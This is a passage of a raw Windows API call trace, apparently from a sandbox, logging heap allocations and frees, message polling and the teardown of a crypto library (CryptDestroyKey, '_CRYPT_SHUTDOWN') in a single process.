returned 0 [0249.598] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.598] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0249.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0249.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0249.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0249.599] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0249.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0249.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0249.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0249.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0249.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0249.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0249.599] CryptDestroyKey (hKey=0xa87690) returned 1 [0249.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0249.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0249.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0249.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0249.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0249.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0249.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0249.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0249.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0249.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0249.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0249.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0249.601] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0249.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0249.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0249.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0249.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0249.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0249.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0249.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0249.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0249.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0249.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0249.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.602] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0249.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0249.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0249.602] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0249.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0249.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0249.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0249.602] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0249.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0249.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0249.602] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0249.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0249.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0249.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0249.602] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0249.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0249.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0249.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0249.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0249.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0249.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0249.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0249.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0249.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0249.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0249.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0249.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0249.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0249.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0249.603] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0249.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.604] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0249.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0249.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0249.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0249.604] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0249.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0249.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0249.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0249.604] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0249.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0249.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0249.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0249.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0249.605] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0249.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0249.605] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0249.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0249.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.605] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0249.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0249.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0249.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0249.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0249.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0249.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0249.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0249.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0249.606] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0249.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0249.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0249.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0249.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0249.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0249.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0249.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0249.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0249.607] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0249.608] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0249.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0249.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0249.608] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0249.608] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0249.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0249.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0249.608] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0249.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0249.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0249.608] 